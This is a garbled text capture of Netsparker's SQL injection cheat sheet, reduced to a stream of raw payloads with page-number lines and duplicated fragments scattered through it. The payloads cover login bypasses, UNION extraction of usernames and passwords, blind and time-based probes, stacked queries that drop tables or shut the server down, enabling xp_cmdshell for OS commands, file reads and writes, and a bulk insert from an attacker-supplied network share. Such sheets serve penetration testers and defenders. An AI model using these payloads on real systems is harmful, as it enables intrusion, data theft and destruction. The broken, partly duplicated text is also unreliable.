SQL Injection Cheat Sheet - Netsparker

SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...
1 de 21 21/11/2017 01:13 p. m.
2 de 21 21/11/2017 01:13 p. m.
--
DROP sampletable;--
#
DROP sampletable;#
admin'--
SELECT * FROM members WHERE username = 'admin'--' AND password =

'password'
/*Comment Here*/
DROP/*comment*/sampletable
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members
/*! MYSQL Special SQL *
SELECT /*!32302 1/0, */ 1 FROM tablename
10; DROP TABLE members /*

10; DROP
TABLE members --
/*! 32302 10*/
3 de 21 21/11/2017 01:13 p. m.
10
;
SELECT * FROM members; DROP members--
10;DROP members --
SELECT * FROM products WHERE id = 10; DROP members--
IF(condition,true-part,false-part)
4 de 21 21/11/2017 01:13 p. m.
SELECT IF(1=1,'true','false')
IF condition true-part ELSE false-part

IF (1=1) SELECT 'true' ELSE SELECT 'false'
BEGIN
IF condition THEN true-part; ELSE false-part; END IF; END;
IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;
END;
SELECT CASE WHEN condition THEN true-part ELSE false-part

SELECT CASE WEHEN (1=1) THEN 'A' ELSE 'B'END;
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select

1/0
0xHEXNUMBER
SELECT CHAR(0x66)
SELECT 0x5045
SELECT 0x50 + 0x45
+
SELECT login + '-' + password FROM members
||
SELECT login || '-' || password FROM members
CONCAT()
5 de 21 21/11/2017 01:13 p. m.
CONCAT(str1, str2, str3, ...)
SELECT CONCAT(login, password) FROM members
CHAR() CONCAT()
0x457578
SELECT 0x457578
SELECT CONCAT('0x',HEX('c:\\boot.ini'))
CONCAT()
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT CHR(75)||CHR(76)||CHR(77)
SELECT (CHaR(75)||CHaR(76)||CHaR(77))
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
ASCII()
SELECT ASCII('a')
CHAR()
SELECT CHAR(64)
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
6 de 21 21/11/2017 01:13 p. m.
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
field COLLATE SQL_Latin1_General_Cp1254_CS_AS
SELECT header FROM news UNION ALL SELECT name COLLATE

SQL_Latin1_General_Cp1254_CS_AS FROM members
Hex()
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
7 de 21 21/11/2017 01:13 p. m.
admin' AND 1=0 UNION ALL SELECT 'admin',

'81dc9bdb52d04dc20036dbd8313ed055'
1234
81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2,

columnfromerror(n) HAVING 1=1 --
ORDER BY 1--
ORDER BY 2--
ORDER BY N--
8 de 21 21/11/2017 01:13 p. m.
' union select sum(columntofind) from users--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.
SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null,

NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULl, NULL--
11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-
11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-
11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 –-
11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 –-
Microsoft OLE DB Provider for SQL Server error '80040e07'

Explicit conversion from data type int to image is not allowed.
'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
9 de 21 21/11/2017 01:13 p. m.
INSERT INTO members(id, user, pass) VALUES(1,

''+SUBSTRING(@@version,1,10) ,10)
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp

-c -Slocalhost -Usa -Pfoobar
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec
sp_oamethod @o, 'run', NULL, 'notepad.exe' --
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
EXEC master.dbo.xp_cmdshell 'ping '
master..sysmessages
master..sysservers
masters..sysxlogins
sys.sql_logins
10 de 21 21/11/2017 01:13 p. m.
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result =

0) SELECT 0 ELSE SELECT 1/0
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
11 de 21 21/11/2017 01:13 p. m.
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10
;
';shutdown --
EXEC sp_configure 'show advanced options',1

RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1

RECONFIGURE
SELECT name FROM sysobjects WHERE xtype = 'U'
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE

name = 'tablenameforcolumnnames')
NOT IN NOT EXIST

... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name
FROM members)
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from

(SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE
i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int
12 de 21 21/11/2017 01:13 p. m.
Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects

i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE
o.xtype = 'U') as p where p.x=21
';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name

FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name =
'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--
SELECT table_name FROM information_schema.tables WHERE table_schema =

'tablename'
SELECT table_name, column_name FROM information_schema.columns WHERE

table_schema = 'tablename'
SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'
13 de 21 21/11/2017 01:13 p. m.
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND

ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55
AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE
xtYpe=0x55)),1,1)),0)>78--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND

xtYpe=0x55)),1,1)),0)>103--

xtYpe=0x55)),1,1)),0)
xtYpe=0x55)),1,1)),0)>89--

xtYpe=0x55)),1,1)),0)
xtYpe=0x55)),1,1)),0)>83--
14 de 21 21/11/2017 01:13 p. m.

xtYpe=0x55)),1,1)),0)
xtYpe=0x55)),1,1)),0)>80--

xtYpe=0x55)),1,1)),0)
WAITFOR DELAY '0:0:10'--
WAITFOR DELAY '0:0:0.51'
if (select user) = 'sa' waitfor delay '0:0:10'
1;waitfor delay '0:0:10'--
1);waitfor delay '0:0:10'--
1';waitfor delay '0:0:10'--
1');waitfor delay '0:0:10'--
1));waitfor delay '0:0:10'--
15 de 21 21/11/2017 01:13 p. m.
1'));waitfor delay '0:0:10'--
BENCHMARK(howmanytimes, do this)
IF EXISTS (SELECT * FROM users WHERE username = 'root')

BENCHMARK(1000000000,MD5(1))
IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
SELECT pg_sleep(10);
SELECT sleep(10);
(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100)

THEN dbms_pipe.receive_message(('xyz'),10) ELSE
dbms_pipe.receive_message(('xyz'),1) END FROM dual)
16 de 21 21/11/2017 01:13 p. m.
product.asp?id=4 (SMO)
product.asp?id=5-1
product.asp?id=4 OR 1=1
product.asp?name=Book
product.asp?name=Bo'%2b'ok
product.asp?name=Bo' || 'ok (OM)
product.asp?name=Book' OR 'x'='x
SELECT User,Password FROM mysql.user;
SELECT 1,1 UNION SELECT

IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0)
User,Password FROM mysql.user WHERE User = 'root';
SEL ECT ... INTO DUMPFILE

Write quer y into a new file (can not modify existing files)
create function LockWorkStation returns integer soname

'user32';
select LockWorkStation();
create function ExitProcess returns integer soname 'kernel32';
select exitprocess();
SELECT USER();
SELECT password,USER() FROM mysql.user;
SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE

user_group = 1;
query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
create table foo( line blob );

load data infile 'c:/boot.ini' into table foo;
17 de 21 21/11/2017 01:13 p. m.
select * from foo;
select benchmark( 500000, sha1( 'test' ) );
query.php?user=1+union+select+benchmark(500000,sha1
(0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
select if( user() like 'root@%', benchmark(100000,sha1('test')),

'false' );
select if( (ascii(substring(user(),1,1)) >> 7) & 1,

benchmark(100000,sha1('test')), 'false' );
MD5()
SHA1()
PASSWORD()
ENCODE()
COMPRESS()
ROW_COUNT()
SCHEMA()
VERSION()
@@version
' + (SELECT TOP 1 password FROM users ) + '

[email protected]
18 de 21 21/11/2017 01:13 p. m.
bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'
19 de 21 21/11/2017 01:13 p. m.
20 de 21 21/11/2017 01:13 p. m.
21 de 21 21/11/2017 01:13 p. m.

SQL Injection Cheat Sheet - Netsparker

Uploaded by

SQL Injection Cheat Sheet - Netsparker

Uploaded by

SQL Injection Cheat Sheet | Netsparker https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/...

SELECT * FROM members WHERE username = 'admin'--' AND password =

/*! MYSQL Special SQL *

SELECT /*!32302 1/0, */ 1 FROM tablename

10; DROP TABLE members /*

SELECT /*!32302 1/0, */ 1 FROM tablename

/*! 32302 10*/

SELECT /*!32302 1/0, */ 1 FROM tablename

SELECT * FROM products WHERE id = 10; DROP members--

IF condition true-part ELSE false-part

SELECT CASE WHEN condition THEN true-part ELSE false-part

if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select

CONCAT(str1, str2, str3, ...)

SELECT CONCAT(login, password) FROM members

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

field COLLATE SQL_Latin1_General_Cp1254_CS_AS

SELECT header FROM news UNION ALL SELECT name COLLATE

' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

admin' AND 1=0 UNION ALL SELECT 'admin',

' GROUP BY table.columnfromerror1 HAVING 1=1 --

' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --

' GROUP BY table.columnfromerror1, columnfromerror2,

' union select sum(columntofind) from users--

SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null,

11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-

11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-

11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --

11223344) UNION SELECT 1,'2',NULL,NULL WHERE 1=2 –-

11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 –-

Microsoft OLE DB Provider for SQL Server error '80040e07'

'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*

INSERT INTO members(id, user, pass) VALUES(1,

bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp

EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

EXEC master.dbo.xp_cmdshell 'ping '

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result =

INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"

EXEC sp_configure 'show advanced options',1

EXEC sp_configure 'xp_cmdshell',1

SELECT name FROM sysobjects WHERE xtype = 'U'

SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE

NOT IN NOT EXIST

SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from

Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects

';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name

SELECT table_name FROM information_schema.tables WHERE table_schema =

SELECT table_name, column_name FROM information_schema.columns WHERE

SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'

SELECT * FROM all_col_comments WHERE TABLE_NAME = 'TABLE'

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND

TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND

FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND

WAITFOR DELAY '0:0:10'--

WAITFOR DELAY '0:0:0.51'

if (select user) = 'sa' waitfor delay '0:0:10'

1;waitfor delay '0:0:10'--

1);waitfor delay '0:0:10'--

1';waitfor delay '0:0:10'--

1');waitfor delay '0:0:10'--

1));waitfor delay '0:0:10'--

1'));waitfor delay '0:0:10'--

IF EXISTS (SELECT * FROM users WHERE username = 'root')

IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

(SELECT CASE WHEN (NVL(ASCII(SUBSTR(({INJECTION}),1,1)),0) = 100)

product.asp?name=Bo' || 'ok (OM)

SELECT User,Password FROM mysql.user;

SELECT 1,1 UNION SELECT

SEL ECT ... INTO DUMPFILE

create function LockWorkStation returns integer soname

create function ExitProcess returns integer soname 'kernel32';

SELECT password,USER() FROM mysql.user;

SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE

/! MYSQL Special SQL

SELECT /!32302 1/0, / 1 FROM tablename

SELECT /!32302 1/0, / 1 FROM tablename

/! 32302 10/

SELECT /!32302 1/0, / 1 FROM tablename

SELECT * FROM master..sysprocesses /WHERE spid=@@SPID/